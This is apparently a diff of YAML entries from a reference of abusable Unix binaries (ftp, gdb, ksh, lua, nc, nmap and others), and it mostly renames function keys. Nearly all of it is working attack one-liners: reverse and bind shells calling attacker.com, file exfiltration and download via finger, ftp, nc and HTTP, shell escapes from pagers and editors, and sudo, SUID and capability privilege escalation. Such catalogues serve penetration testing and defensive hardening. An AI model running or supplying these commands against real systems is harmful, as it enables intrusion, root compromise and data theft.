||||||
upload:
|
file-upload:
|
||||||
- description: Send a binary file to a TCP port. Run `sudo nc -l -p 79 | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
|
- description: Send a binary file to a TCP port. Run `sudo nc -l -p 79 | base64 -d > "file_to_save"` on the attacker box to collect the file. The file length is limited by the maximum size of arguments.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
LFILE=file_to_send
|
LFILE=file_to_send
|
||||||
finger "$(base64 $LFILE)@$RHOST"
|
finger "$(base64 $LFILE)@$RHOST"
|
||||||
download:
|
file-download:
|
||||||
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | sudo nc -l -p 79` on the attacker box to send the file.
|
- description: Fetch remote binary file from a remote TCP port. Run `base64 "file_to_send" | sudo nc -l -p 79` on the attacker box to send the file.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: flock -u / /bin/sh
|
- code: flock -u / /bin/sh
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./flock -u / /bin/sh -p
|
- code: ./flock -u / /bin/sh -p
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo flock -u / /bin/sh
|
- code: sudo flock -u / /bin/sh
|
||||||
---
|
---
|
||||||
|
@ -5,11 +5,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
fmt -pNON_EXISTING_PREFIX "$LFILE"
|
fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./fmt -pNON_EXISTING_PREFIX "$LFILE"
|
./fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
|
sudo fmt -pNON_EXISTING_PREFIX "$LFILE"
|
||||||
|
@ -4,11 +4,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
fold -w99999999 "$LFILE"
|
fold -w99999999 "$LFILE"
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./fold -w99999999 "$LFILE"
|
./fold -w99999999 "$LFILE"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo fold -w99999999 "$LFILE"
|
sudo fold -w99999999 "$LFILE"
|
||||||
|
@ -1,22 +1,22 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
ftp
|
ftp
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
upload:
|
file-upload:
|
||||||
- description: Send local file to a FTP server.
|
- description: Send local file to a FTP server.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
ftp $RHOST
|
ftp $RHOST
|
||||||
put file_to_send
|
put file_to_send
|
||||||
download:
|
file-download:
|
||||||
- description: Fetch a remote file from a FTP server.
|
- description: Fetch a remote file from a FTP server.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
ftp $RHOST
|
ftp $RHOST
|
||||||
get file_to_get
|
get file_to_get
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
sudo ftp
|
sudo ftp
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: gdb -nx -ex '!sh' -ex quit
|
- code: gdb -nx -ex '!sh' -ex quit
|
||||||
reverse-shell-interactive:
|
reverse-shell:
|
||||||
- description: This requires that GDB is compiled with Python support. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
- description: This requires that GDB is compiled with Python support. Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
@ -11,7 +11,7 @@ functions:
|
|||||||
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
|
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
|
||||||
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
|
||||||
pty.spawn("/bin/sh")' -ex quit
|
pty.spawn("/bin/sh")' -ex quit
|
||||||
upload:
|
file-upload:
|
||||||
- description: This requires that GDB is compiled with Python support. Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
- description: This requires that GDB is compiled with Python support. Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
export URL=http://attacker.com/
|
export URL=http://attacker.com/
|
||||||
@ -27,7 +27,7 @@ functions:
|
|||||||
if sys.version_info.major == 3: import http.server as s, socketserver as ss
|
if sys.version_info.major == 3: import http.server as s, socketserver as ss
|
||||||
else: import SimpleHTTPServer as s, SocketServer as ss
|
else: import SimpleHTTPServer as s, SocketServer as ss
|
||||||
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit
|
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' -ex quit
|
||||||
download:
|
file-download:
|
||||||
- description: This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request.
|
- description: This requires that GDB is compiled with Python support. Fetch a remote file via HTTP GET request.
|
||||||
code: |
|
code: |
|
||||||
export URL=http://attacker.com/file_to_get
|
export URL=http://attacker.com/file_to_get
|
||||||
@ -44,12 +44,12 @@ functions:
|
|||||||
file-read:
|
file-read:
|
||||||
- description: This requires that GDB is compiled with Python support.
|
- description: This requires that GDB is compiled with Python support.
|
||||||
code: gdb -nx -ex 'python print(open("file_to_read").read())' -ex quit
|
code: gdb -nx -ex 'python print(open("file_to_read").read())' -ex quit
|
||||||
load-library:
|
library-load:
|
||||||
- description: This requires that GDB is compiled with Python support.
|
- description: This requires that GDB is compiled with Python support.
|
||||||
code: gdb -nx -ex 'python from ctypes import cdll; cdll.LoadLibrary("lib.so")' -ex quit
|
code: gdb -nx -ex 'python from ctypes import cdll; cdll.LoadLibrary("lib.so")' -ex quit
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||||
capabilities-enabled:
|
capabilities:
|
||||||
- description: This requires that GDB is compiled with Python support.
|
- description: This requires that GDB is compiled with Python support.
|
||||||
code: ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
|
code: ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
|
||||||
---
|
---
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: PAGER='sh -c "exec sh 0<&1"' git -p help
|
- code: PAGER='sh -c "exec sh 0<&1"' git -p help
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
|
- code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
|
||||||
suid-limited:
|
limited-suid:
|
||||||
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
|
- code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
|
||||||
---
|
---
|
||||||
|
@ -6,11 +6,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
grep '' $LFILE
|
grep '' $LFILE
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./grep '' $LFILE
|
./grep '' $LFILE
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo grep '' $LFILE
|
sudo grep '' $LFILE
|
||||||
|
@ -4,11 +4,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
head -c1G "$LFILE"
|
head -c1G "$LFILE"
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./head -c1G "$LFILE"
|
./head -c1G "$LFILE"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo head -c1G "$LFILE"
|
sudo head -c1G "$LFILE"
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: ionice /bin/sh
|
- code: ionice /bin/sh
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./ionice /bin/sh -p
|
- code: ./ionice /bin/sh -p
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo ionice /bin/sh
|
- code: sudo ionice /bin/sh
|
||||||
---
|
---
|
||||||
|
@ -4,11 +4,11 @@ description: |
|
|||||||
|
|
||||||
This might not work if run by unprivileged users depending on the system configuration.
|
This might not work if run by unprivileged users depending on the system configuration.
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
journalctl
|
journalctl
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
sudo journalctl
|
sudo journalctl
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
@ -4,11 +4,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
jq -Rr . "$LFILE"
|
jq -Rr . "$LFILE"
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./jq -Rr . "$LFILE"
|
./jq -Rr . "$LFILE"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo jq -Rr . "$LFILE"
|
sudo jq -Rr . "$LFILE"
|
||||||
|
@ -1,14 +1,14 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: ksh
|
- code: ksh
|
||||||
reverse-shell-interactive:
|
reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
|
ksh -c 'ksh -i > /dev/tcp/$RHOST/$RPORT 2>&1 0>&1'
|
||||||
upload:
|
file-upload:
|
||||||
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
- description: Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
@ -21,7 +21,7 @@ functions:
|
|||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
export LFILE=file_to_send
|
export LFILE=file_to_send
|
||||||
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
ksh -c 'cat $LFILE > /dev/tcp/$RHOST/$RPORT'
|
||||||
download:
|
file-download:
|
||||||
- description: Fetch a remote file via HTTP GET request.
|
- description: Fetch a remote file via HTTP GET request.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
@ -49,8 +49,8 @@ functions:
|
|||||||
code: |
|
code: |
|
||||||
export LFILE=file_to_read
|
export LFILE=file_to_read
|
||||||
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
|
ksh -c $'read -r -d \x04 < "$LFILE"; echo "$REPLY"'
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./ksh -p
|
- code: ./ksh -p
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo ksh
|
- code: sudo ksh
|
||||||
---
|
---
|
||||||
|
@ -7,10 +7,10 @@ description: |
|
|||||||
/lib64/ld-linux-x86-64.so.2
|
/lib64/ld-linux-x86-64.so.2
|
||||||
```
|
```
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: /lib/ld.so /bin/sh
|
- code: /lib/ld.so /bin/sh
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./ld.so /bin/sh -p
|
- code: ./ld.so /bin/sh -p
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo /lib/ld.so /bin/sh
|
- code: sudo /lib/ld.so /bin/sh
|
||||||
---
|
---
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
less /etc/profile
|
less /etc/profile
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
@ -14,10 +14,10 @@ functions:
|
|||||||
echo DATA | less
|
echo DATA | less
|
||||||
sfile_to_write
|
sfile_to_write
|
||||||
q
|
q
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
sudo less /etc/profile
|
sudo less /etc/profile
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./less file_to_read
|
- code: ./less file_to_read
|
||||||
---
|
---
|
||||||
|
@ -1,7 +1,7 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: ltrace -b -L /bin/sh
|
- code: ltrace -b -L /bin/sh
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo ltrace -b -L /bin/sh
|
- code: sudo ltrace -b -L /bin/sh
|
||||||
---
|
---
|
||||||
|
@ -1,8 +1,8 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: lua -e 'os.execute("/bin/sh")'
|
- code: lua -e 'os.execute("/bin/sh")'
|
||||||
reverse-shell-non-interactive:
|
non-interactive-reverse-shell:
|
||||||
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed.
|
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
@ -15,7 +15,7 @@ functions:
|
|||||||
local b=assert(f:read("*a"));t:send(b);
|
local b=assert(f:read("*a"));t:send(b);
|
||||||
end;
|
end;
|
||||||
f:close();t:close();'
|
f:close();t:close();'
|
||||||
bind-shell-non-interactive:
|
non-interactive-bind-shell:
|
||||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. This requires `lua-socket` installed.
|
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. This requires `lua-socket` installed.
|
||||||
code: |
|
code: |
|
||||||
export LPORT=12345
|
export LPORT=12345
|
||||||
@ -26,7 +26,7 @@ functions:
|
|||||||
local r,x=c:receive();local f=assert(io.popen(r,"r"));
|
local r,x=c:receive();local f=assert(io.popen(r,"r"));
|
||||||
local b=assert(f:read("*a"));c:send(b);
|
local b=assert(f:read("*a"));c:send(b);
|
||||||
end;c:close();f:close();'
|
end;c:close();f:close();'
|
||||||
upload:
|
file-upload:
|
||||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires `lua-socket` installed.
|
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file. This requires `lua-socket` installed.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
@ -41,7 +41,7 @@ functions:
|
|||||||
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
|
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
|
||||||
t:send(d);
|
t:send(d);
|
||||||
t:close();'
|
t:close();'
|
||||||
download:
|
file-download:
|
||||||
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
|
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
|
||||||
< "file_to_send"` on the attacker box to send the file. This requires `lua-socket` installed.
|
< "file_to_send"` on the attacker box to send the file. This requires `lua-socket` installed.
|
||||||
code: |
|
code: |
|
||||||
@ -59,8 +59,8 @@ functions:
|
|||||||
- code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
|
- code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
|
||||||
file-read:
|
file-read:
|
||||||
- code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
|
- code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo lua -e 'os.execute("/bin/sh")'
|
- code: sudo lua -e 'os.execute("/bin/sh")'
|
||||||
suid-limited:
|
limited-suid:
|
||||||
- code: ./lua -e 'os.execute("/bin/sh")'
|
- code: ./lua -e 'os.execute("/bin/sh")'
|
||||||
---
|
---
|
||||||
|
@ -1,13 +1,13 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- description: This creates a valid Mbox file which may be required by the binary.
|
- description: This creates a valid Mbox file which may be required by the binary.
|
||||||
code: |
|
code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo "From nobody@localhost $(date)" > $TF
|
echo "From nobody@localhost $(date)" > $TF
|
||||||
mail -f $TF
|
mail -f $TF
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- description: This creates a valid Mbox file which may be required by the binary.
|
- description: This creates a valid Mbox file which may be required by the binary.
|
||||||
code: |
|
code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
|
@ -1,7 +1,7 @@
|
|||||||
---
|
---
|
||||||
description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`.
|
description: All these examples only work with GNU `make` due to the lack of support of the `--eval` flag. The same can be achieved by using a proper `Makefile` or by passing the content via stdin using `-f -`.
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
COMMAND='/bin/sh'
|
COMMAND='/bin/sh'
|
||||||
make -s --eval=$'x:\n\t-'"$COMMAND"
|
make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||||
@ -10,11 +10,11 @@ functions:
|
|||||||
code: |
|
code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
make -s --eval="\$(file >$LFILE,DATA)" .
|
make -s --eval="\$(file >$LFILE,DATA)" .
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
COMMAND='/bin/sh -p'
|
COMMAND='/bin/sh -p'
|
||||||
./make -s --eval=$'x:\n\t-'"$COMMAND"
|
./make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
COMMAND='/bin/sh'
|
COMMAND='/bin/sh'
|
||||||
sudo make -s --eval=$'x:\n\t-'"$COMMAND"
|
sudo make -s --eval=$'x:\n\t-'"$COMMAND"
|
||||||
|
@ -1,16 +1,16 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
man man
|
man man
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
file-read:
|
file-read:
|
||||||
- code: man file_to_read
|
- code: man file_to_read
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
sudo man man
|
sudo man man
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
suid-limited:
|
limited-suid:
|
||||||
- code: |
|
- code: |
|
||||||
./man man
|
./man man
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
@ -1,14 +1,14 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
TERM= more /etc/profile
|
TERM= more /etc/profile
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
file-read:
|
file-read:
|
||||||
- code: more file_to_read
|
- code: more file_to_read
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./more file_to_read
|
- code: ./more file_to_read
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
TERM= sudo -E more /etc/profile
|
TERM= sudo -E more /etc/profile
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
|
- description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
|
||||||
code: |
|
code: |
|
||||||
sudo mount -o bind /bin/sh /bin/mount
|
sudo mount -o bind /bin/sh /bin/mount
|
||||||
|
@ -1,13 +1,13 @@
|
|||||||
---
|
---
|
||||||
description: This can be used to move and then read or write files from a restricted file systems or with elevated privileges.
|
description: This can be used to move and then read or write files from a restricted file systems or with elevated privileges.
|
||||||
functions:
|
functions:
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo "DATA" > $TF
|
echo "DATA" > $TF
|
||||||
./mv $TF $LFILE
|
./mv $TF $LFILE
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_write
|
LFILE=file_to_write
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
|
@ -1,10 +1,10 @@
|
|||||||
---
|
---
|
||||||
description: A valid MySQL server must be available.
|
description: A valid MySQL server must be available.
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: mysql -e '\! /bin/sh'
|
- code: mysql -e '\! /bin/sh'
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo mysql -e '\! /bin/sh'
|
- code: sudo mysql -e '\! /bin/sh'
|
||||||
suid-limited:
|
limited-suid:
|
||||||
- code: ./mysql -e '\! /bin/sh'
|
- code: ./mysql -e '\! /bin/sh'
|
||||||
---
|
---
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'exec sh' > $TF
|
echo 'exec sh' > $TF
|
||||||
@ -14,14 +14,14 @@ functions:
|
|||||||
^O
|
^O
|
||||||
file-read:
|
file-read:
|
||||||
- code: nano file_to_read
|
- code: nano file_to_read
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'exec sh -p' > $TF
|
echo 'exec sh -p' > $TF
|
||||||
chmod +x $TF
|
chmod +x $TF
|
||||||
./nano -s $TF /etc/hosts
|
./nano -s $TF /etc/hosts
|
||||||
^T
|
^T
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'exec sh' > $TF
|
echo 'exec sh' > $TF
|
||||||
|
@ -1,36 +1,36 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
reverse-shell-interactive:
|
reverse-shell:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
nc -e /bin/sh $RHOST $RPORT
|
nc -e /bin/sh $RHOST $RPORT
|
||||||
bind-shell-interactive:
|
bind-shell:
|
||||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. This only works with netcat traditional.
|
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. This only works with netcat traditional.
|
||||||
code: |
|
code: |
|
||||||
LPORT=12345
|
LPORT=12345
|
||||||
nc -l -p $LPORT -e /bin/sh
|
nc -l -p $LPORT -e /bin/sh
|
||||||
upload:
|
file-upload:
|
||||||
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
LFILE=file_to_send
|
LFILE=file_to_send
|
||||||
nc $RHOST $RPORT < "$LFILE"
|
nc $RHOST $RPORT < "$LFILE"
|
||||||
download:
|
file-download:
|
||||||
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
|
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
|
||||||
code: |
|
code: |
|
||||||
LPORT=12345
|
LPORT=12345
|
||||||
LFILE=file_to_save
|
LFILE=file_to_save
|
||||||
nc -l -p $LPORT > "$LFILE"
|
nc -l -p $LPORT > "$LFILE"
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
sudo nc -e /bin/sh $RHOST $RPORT
|
sudo nc -e /bin/sh $RHOST $RPORT
|
||||||
suid-limited:
|
limited-suid:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. This only works with netcat traditional.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
|
@ -1,9 +1,9 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- code: nice /bin/sh
|
- code: nice /bin/sh
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: ./nice /bin/sh -p
|
- code: ./nice /bin/sh -p
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: sudo nice /bin/sh
|
- code: sudo nice /bin/sh
|
||||||
---
|
---
|
||||||
|
@ -5,11 +5,11 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
nl -bn -w1 -s '' $LFILE
|
nl -bn -w1 -s '' $LFILE
|
||||||
suid-enabled:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
./nl -bn -w1 -s '' $LFILE
|
./nl -bn -w1 -s '' $LFILE
|
||||||
sudo-enabled:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo nl -bn -w1 -s '' $LFILE
|
sudo nl -bn -w1 -s '' $LFILE
|
||||||
|
@ -1,12 +1,12 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
execute-interactive:
|
shell:
|
||||||
- description: Input echo is disabled.
|
- description: Input echo is disabled.
|
||||||
code: |
|
code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'os.execute("/bin/sh")' > $TF
|
echo 'os.execute("/bin/sh")' > $TF
|
||||||
nmap --script=$TF
|
nmap --script=$TF
|
||||||
reverse-shell-non-interactive:
|
non-interactive-reverse-shell:
|
||||||
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell.
|
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
@ -21,7 +21,7 @@ functions:
|
|||||||
end;
|
end;
|
||||||
